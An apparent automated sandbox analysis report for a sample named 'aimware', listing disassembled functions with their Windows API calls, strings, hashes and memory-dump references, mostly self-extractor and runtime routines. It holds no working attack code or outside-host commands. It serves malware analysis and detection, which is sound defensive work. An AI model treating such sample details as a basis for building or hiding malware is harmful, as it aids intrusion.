Instruction ID: 8272627e7e7252b43aa2ecb9ce792c1d631d19bece63b89d16bee7e0ee3d3f9b
Opcode Fuzzy Hash: f5612d240117a4efae0307b9e9854d6559a558001c88fed748b2bee16c78506c
Instruction Fuzzy Hash: ED21D332214205BBE6219B76ED4FF7B3BBDEB4AB41F024018F601A74A0DF639901D635

Function 00ACFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,4287313C,00000001,00000000,00000000,?,?,00ABAF6C,ROOT\CIMV2), ref: 00ACFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00ABAF6C,ROOT\CIMV2), ref: 00ACFE14
SysAllocString.OLEAUT32(00000000), ref: 00ACFE1F
_com_issue_error.COMSUPP ref: 00ACFE48
_com_issue_error.COMSUPP ref: 00ACFE52
GetLastError.KERNEL32(80070057,4287313C,00000001,00000000,00000000,?,?,00ABAF6C,ROOT\CIMV2), ref: 00ACFE57
_com_issue_error.COMSUPP ref: 00ACFE6A
GetLastError.KERNEL32(00000000,?,?,00ABAF6C,ROOT\CIMV2), ref: 00ACFE80
_com_issue_error.COMSUPP ref: 00ACFE93

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 95bba939acb7c36c440f35034987e1bda827c78ba3b48a90d4a0f7ec388c0af5
Instruction ID: b53bb68cc7ce0b322958a68c78873ed363ca47a27bd601db6dc249627cc8f95a
Opcode Fuzzy Hash: 95bba939acb7c36c440f35034987e1bda827c78ba3b48a90d4a0f7ec388c0af5
Instruction Fuzzy Hash: 27410B72A00249AFCB10DFA8CD45FAEBBA9EB44714F15427EF905D7291DB349900C7A1

Function 00ABAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00ABAF29

Strings

ROOT\CIMV2, xrefs: 00ABAF5C
WQL, xrefs: 00ABAFDC
SELECT * FROM Win32_OperatingSystem, xrefs: 00ABAFCA
Name, xrefs: 00ABB0B0
Windows 10, xrefs: 00ABB0C2

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: cf14c7e9c264c4acfbac6b044766b79a95923ec9e3cd4ceca1abd82cfb3d781a
Instruction ID: 27c91e2a8bf913a2f7b5c09d7b57c28ec67fae9847fe21de3c47cae07a4c2d19
Opcode Fuzzy Hash: cf14c7e9c264c4acfbac6b044766b79a95923ec9e3cd4ceca1abd82cfb3d781a
Instruction Fuzzy Hash: 45718B71A00259AFDF14DFA5CC999FEB7B8FF48310B10055DE512A72A1CB70AE02CB60

Function 00AB9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00AB93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00AB93C9

Part of subcall function 00ABC29A: _wcslen.LIBCMT ref: 00ABC2A2

Part of subcall function 00AC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00ABC116,00000000,.exe,?,?,00000800,?,?,?,00AC8E3C), ref: 00AC1FD1

_swprintf.LIBCMT ref: 00AB9465

Part of subcall function 00AB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB40A5

MoveFileW.KERNEL32(?,?), ref: 00AB94D4
MoveFileW.KERNEL32(?,?), ref: 00AB9514

Strings

rtmp%d, xrefs: 00AB944E

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 8f0d07bad4e8f2994052c6505b9a099f11c8c326a8b5b50bd711ab1b464b6de4
Instruction ID: bcd5768aef03b91b79ed966aa5c02d8fe3ba4b0966c9354fa6198be909afab89
Opcode Fuzzy Hash: 8f0d07bad4e8f2994052c6505b9a099f11c8c326a8b5b50bd711ab1b464b6de4
Instruction Fuzzy Hash: 224143B1940258A6DF31EBA0CD55EEF737CAF45340F0049A9B749E3153EB789B898B60

Function 00AC1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00AC122E

Part of subcall function 00ABB146: GetVersionExW.KERNEL32(?), ref: 00ABB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00AC1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00AC1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00AC1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00AC1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00AC1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00AC12CF
__aullrem.LIBCMT ref: 00AC1379

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 47f76caa54ae5963d80901da4c8fac25a3b62704d8a7dafa78a8cede8ed6dbc7
Instruction ID: ba5fe36f4a8cdf5d23df292883e014eb6aa15901725fe451e810c26ad1203fd5
Opcode Fuzzy Hash: 47f76caa54ae5963d80901da4c8fac25a3b62704d8a7dafa78a8cede8ed6dbc7
Instruction Fuzzy Hash: 294118B65083459FCB50DF65C884A6BBBF9FF88314F008A2EF596C6211E734E549CB51

Function 00AB2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00AB2536

Part of subcall function 00AB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB40A5

Part of subcall function 00AC05DA: _wcslen.LIBCMT ref: 00AC05E0

Strings

xc%u, xrefs: 00AB275A
;%u, xrefs: 00AB2523
x%u, xrefs: 00AB26FD

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 163e760cc94c6778f96320cfa849aa598badf13af666445b3ee716b97126609c
Instruction ID: 8cee90850d6756d512a09447cc2ec7079701567404a99480e343de3d600cada5
Opcode Fuzzy Hash: 163e760cc94c6778f96320cfa849aa598badf13af666445b3ee716b97126609c
Instruction Fuzzy Hash: 3BF127706043409BDB25EF6885D5FFE7B9D6FA5300F08056EFC869B283CB649949C7A2

Function 00AC9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AC9D0A

Strings

<br>, xrefs: 00AC9DFE
<style>, xrefs: 00AC9E30
</p>, xrefs: 00AC9DE8
</style>, xrefs: 00AC9E52
>, xrefs: 00AC9D4B

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: b88435293a98d6607bc623e2676edf8f23e2f897930b6a80028ddcb29c868062
Instruction ID: f7da80fb24d48e0b9dde3cab46da5506f1cf488eca940dbc87702218e52407b6
Opcode Fuzzy Hash: b88435293a98d6607bc623e2676edf8f23e2f897930b6a80028ddcb29c868062
Instruction Fuzzy Hash: B451376670036391DB31AB259819F7773E0DFB5750F6B081EF9C2AB2C0FB658D8182A1

Function 00ADF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00ADFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00ADF6CF
__fassign.LIBCMT ref: 00ADF74A
__fassign.LIBCMT ref: 00ADF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00ADF78B
WriteFile.KERNEL32(?,00000000,00000000,00ADFE02,00000000,?,?,?,?,?,?,?,?,?,00ADFE02,00000000), ref: 00ADF7AA
WriteFile.KERNEL32(?,00000000,00000001,00ADFE02,00000000,?,?,?,?,?,?,?,?,?,00ADFE02,00000000), ref: 00ADF7E3

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a33160b40c3d1e3105d9ae052180278235b307db7628d30c234624a46671618e
Instruction ID: a8a5f0f51247478aeaa7fc19a89ce0b93dd408d8b840874a0187f8465de1d263
Opcode Fuzzy Hash: a33160b40c3d1e3105d9ae052180278235b307db7628d30c234624a46671618e
Instruction Fuzzy Hash: 8C5171B19002499FCB10CFA8DC85AEEBBF4FF19310F14416AE556E7351D670AA41CBA1

Function 00AD2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00AD2937
___except_validate_context_record.LIBVCRUNTIME ref: 00AD293F
_ValidateLocalCookies.LIBCMT ref: 00AD29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00AD29F3
_ValidateLocalCookies.LIBCMT ref: 00AD2A48

Strings

csm, xrefs: 00AD29DD

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 495febf3274556763e06cdd01d9a538fec4574c0f2aeec47c909ec8ce70bcf3f
Instruction ID: 01a72789eba4778eb4de438eb1326385916fc2a51abf6282187dea4e1f03ca22
Opcode Fuzzy Hash: 495febf3274556763e06cdd01d9a538fec4574c0f2aeec47c909ec8ce70bcf3f
Instruction Fuzzy Hash: 4C41C435A00258AFCF10DF68C895B9EBBF5EF54324F148056E816AB3A2D731DA11CF91

Function 00AC9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00AC9EEE
GetWindowRect.USER32(?,00000000), ref: 00AC9F44
ShowWindow.USER32(?,00000005,00000000), ref: 00AC9FDB
SetWindowTextW.USER32(?,00000000), ref: 00AC9FE3
ShowWindow.USER32(00000000,00000005), ref: 00AC9FF9

Strings

RarHtmlClassName, xrefs: 00AC9FA5

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: f240c3ef884702a11adb7ee0bc0519432d4d199e2cf5c7e3e678c9a15afc77ba
Instruction ID: 7c4866be959ccee6fadad43da9f6ce4c1ab13c2356c7df1ad7ecf3d6f68e6ae3
Opcode Fuzzy Hash: f240c3ef884702a11adb7ee0bc0519432d4d199e2cf5c7e3e678c9a15afc77ba
Instruction Fuzzy Hash: D641BF32104214FFCB215F649C4DF6BBBA8FB48B45F01855DF84AAA156EB34D914CBA1

Function 00AC9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AC995E
_wcslen.LIBCMT ref: 00AC9993

Strings

, xrefs: 00AC99B0
<br>, xrefs: 00AC99DF
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00AC9987
 , xrefs: 00AC9A21

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 16c914a6d7492fd9428b2188d96e831e1bc8c45203d0fe03f52afe3c809ef896
Instruction ID: 1639e2f8c1fbda5d041288e3c354e6db3ecef55c2a80306532f3a6fea4fc03eb
Opcode Fuzzy Hash: 16c914a6d7492fd9428b2188d96e831e1bc8c45203d0fe03f52afe3c809ef896
Instruction Fuzzy Hash: 71315B3264434566DA30AB949D46F7B73E8FB90360F51842FF497572D0FB64AD4283A1

Function 00ADC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ADC868: _free.LIBCMT ref: 00ADC891

_free.LIBCMT ref: 00ADC8F2

Part of subcall function 00AD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?), ref: 00AD8DE2
Part of subcall function 00AD8DCC: GetLastError.KERNEL32(?,?,00ADC896,?,00000000,?,00000000,?,00ADC8BD,?,00000007,?,?,00ADCCBA,?,?), ref: 00AD8DF4

_free.LIBCMT ref: 00ADC8FD
_free.LIBCMT ref: 00ADC908
_free.LIBCMT ref: 00ADC95C
_free.LIBCMT ref: 00ADC967
_free.LIBCMT ref: 00ADC972
_free.LIBCMT ref: 00ADC97D

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: a0dda4c8023a55fe10ce876319480002f81381a22e2be3ad37c3d314fd500f5e
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: B2113D71580B05BAE520B7B1CD07FCB7BAD9F44B10F800D16B2EF66292DA69A505D750

Function 00ACE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00ACE669,00ACE5CC,00ACE86D), ref: 00ACE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00ACE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00ACE630

Strings

AcquireSRWLockExclusive, xrefs: 00ACE615
KERNEL32.DLL, xrefs: 00ACE600
ReleaseSRWLockExclusive, xrefs: 00ACE625

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 737cea99ddf258d7493139959b2630e264dfd0274787d91d1bb1590a480990a1
Instruction ID: b0102cbe54d92133c334885153a964fa8b3cdac9a1e1ac1cd86bff378258a695
Opcode Fuzzy Hash: 737cea99ddf258d7493139959b2630e264dfd0274787d91d1bb1590a480990a1
Instruction Fuzzy Hash: CDF02B337A26A25B0F21CFB95CC9FA722DCAA25755302487DDA05DB100EF20CD515BD0

Function 00AC146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00AC14C2

Part of subcall function 00ABB146: GetVersionExW.KERNEL32(?), ref: 00ABB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AC14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00AC1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00AC1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00AC1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00AC1533

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: b51535348cabbd2ea32bdc2b5dca5af4c12f55aea57df108c9d423ea55a85481
Instruction ID: 236de121f37106e18d4470482662617602446678af2b86acde02d2d25a6ba750
Opcode Fuzzy Hash: b51535348cabbd2ea32bdc2b5dca5af4c12f55aea57df108c9d423ea55a85481
Instruction Fuzzy Hash: 7E31E876118345ABCB04DFA8D89499BB7F8BF98714F004A1EF995C3210E730D549CBA6

Function 00AD2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00AD2AF1,00AD02FC,00ACFA34), ref: 00AD2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AD2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AD2B2F
SetLastError.KERNEL32(00000000,00AD2AF1,00AD02FC,00ACFA34), ref: 00AD2B81

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 01e163aec59cea0536a546657366c651a5eeefae32fb059734ab5e43327b91cc
Instruction ID: bf05383872ddcdfa279c93c5ab83d7c425df92f8ada900036ce86c7dfbb71863
Opcode Fuzzy Hash: 01e163aec59cea0536a546657366c651a5eeefae32fb059734ab5e43327b91cc
Instruction Fuzzy Hash: CE01D4331193116EAB246BB47CC9A663B5AEF227757700B3BF122993E0EF914D01D744

Function 00AD97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00AF1030,00AD4674,00AF1030,?,?,00AD3F73,00000050,?,00AF1030,00000200), ref: 00AD97E9
_free.LIBCMT ref: 00AD981C
_free.LIBCMT ref: 00AD9844
SetLastError.KERNEL32(00000000,?,00AF1030,00000200), ref: 00AD9851
SetLastError.KERNEL32(00000000,?,00AF1030,00000200), ref: 00AD985D
_abort.LIBCMT ref: 00AD9863

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
